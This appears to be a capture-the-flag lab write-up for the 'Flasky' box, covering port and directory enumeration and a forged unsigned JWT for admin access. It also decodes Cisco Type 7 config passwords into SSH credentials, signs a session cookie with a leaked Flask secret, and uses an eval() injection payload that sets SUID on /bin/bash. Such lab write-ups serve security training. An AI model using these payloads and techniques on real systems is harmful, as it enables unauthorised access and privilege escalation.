Flasky
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.201.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 14:02 +08
Nmap scan report for 192.168.201.141
Host is up (0.17s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
5555/tcp open freeciv
20202/tcp open ipdtp-port
Ran a detailed scan on the unknown ports.
$ sudo nmap -p 5555,20202 -sC -sV --min-rate 3000 192.168.201.141
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 14:03 +08
Nmap scan report for 192.168.201.141
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
5555/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Calculator
|_http-server-header: nginx/1.18.0 (Ubuntu)
20202/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Based on the box name, we are likely dealing with a Flask application here.
Web Enum -> JWT Exploit
Port 5555 just shows us a login page:

We don't have any credentials, so let's move on for now.
Port 20202 shows us another login page:

We can use the guest access to view the dashboard, and hints towards abusing JWT:

We can take a look at the cookie value assigned to us:

We can easily change this to exploit it. I also ran a gobuster
scan and found an admin directory:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.201.141:20202 -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.201.141:20202
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/07/15 14:09:54 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 405) [Size: 178]
/guest (Status: 200) [Size: 11865]
Visiting it just shows us this:

Running scans against both of these directories show nothing. I checked the requests in Burp, and there are some allowed methods:

We can send POST and OPTIONS requests to this, but we first need to modify our cookie. The JWT cookie has 3 parts, the encryption type, the actual data and the signature. Since we know there's a problem with the JWT, we can abuse this by replacing the encryption type and the payload:
$ echo -n '{"typ":"JWT","alg":"none"}' | base64
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=
$ echo -n '{"id": "0","guest": "false","admin": true}' | base64
eyJpZCI6ICIwIiwiZ3Vlc3QiOiAiZmFsc2UiLCJhZG1pbiI6IHRydWV9
For the signature, since we did not specify an algorithm, we can leave it blank. The full token is thus:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpZCI6ICIwIiwiZ3Vlc3QiOiAiZmFsc2UiLCJhZG1pbiI6IHRydWV9.
We can then send an empty login request to generate a POST request in Burpsuite, and then modify it to include our JWT token:
POST /admin HTTP/1.1
Host: 192.168.201.141:20202
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://192.168.201.141:20202
Connection: close
Referer: http://192.168.201.141:20202/
Cookie: session=eyJsb2dnZWRfaW4iOmZhbHNlfQ.ZLI2-g.jAwlyKLCDrUP8eKqrY5OqHx15j0; JWT=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpZCI6ICIwIiwiZ3Vlc3QiOiAiZmFsc2UiLCJhZG1pbiI6IHRydWV9.
Upgrade-Insecure-Requests: 1
username=wwwwww&password=w
When we load the request in a Browser, we would see the admin dashboard:

Config -> SSH Creds
At the bottom, we can see users making posts about the configuration files:

This step took forever, but I eventually found the config file at cisco_config
.

These are Cisco Type 7 passwords, which can be decrypted here:
We can then try each password with ssh
, finding that john:NezukoCh@n
works.

Privilege Escalation
Calculator Backup -> Root
Within the user's directories, there's a calc.bak
file present:
john@Flasky:~$ ls -la *
-rw-r--r-- 1 john john 33 Jul 15 06:02 local.txt
Desktop:
total 8
drwxr-xr-x 2 root root 4096 Apr 23 2021 .
drwxr-xr-x 10 john john 4096 Jul 15 06:15 ..
Documents:
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2021 .
drwxr-xr-x 10 john john 4096 Jul 15 06:15 ..
-r--r----- 1 john john 892 Apr 23 2021 calc.bak
It's the Python source code for the calculator application:
john@Flasky:~/Documents$ cat calc.bak
########################
# Calculator v1 Backup #
########################
from flask import Flask, render_template, request, session, abort
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = 'Fl@sKy_Sup3R_S3cR3T'
@app.route('/')
def home():
if not session.get('logged_in'):
return render_template('login')
else:
return "Wrong Pass"
def do_login():
if user == "xxx" && password == "xxx"
login()
else:
print "Password is incorrect!"
def login():
if session.get('logged_in'):
return calc()
def calc():
if input() == a+b:
return add()
if input() == a-b:
return sub()
if input() == a/b:
return div()
if input() == a*b:
return mul()
def add(a, b):
return str(eval("%s + %s" % (a, b)))
def sub(a, b):
return str(eval("%s - %s" % (a, b)))
def mul(a, b):
return str(eval("%s * %s" % (a, b)))
def div(a, b):
return str(eval("%s / %s" % (a, b)))
Since we have the Flask secret, we can create a cookie to bypass this since it only checks for the logged_in
parameter.
$ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'Fl@sKy_Sup3R_S3cR3T'
eyJsb2dnZWRfaW4iOnRydWV9.ZLI_rA.WmTcl0Wa5jOy8ajsJvWhn6npDKA
This allows us to access the calculator application:

The source code uses eval
to calculate the results, which is vulnerable to RCE. We can just inject Python code like this:
POST /div HTTP/1.1
Host: 192.168.201.141:5555
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://192.168.201.141:5555
Connection: close
Referer: http://192.168.201.141:5555/
Cookie: session=eyJsb2dnZWRfaW4iOmZhbHNlfQ.ZLI2-g.jAwlyKLCDrUP8eKqrY5OqHx15j0; JWT=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6ICIxIiwiZ3Vlc3QiOiAidHJ1ZSIsImFkbWluIjogZmFsc2V9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
Upgrade-Insecure-Requests: 1
value1=os.system("chmod+u%2bs+/bin/bash")&value2=1
Then, we can become root
:

Rooted!
Last updated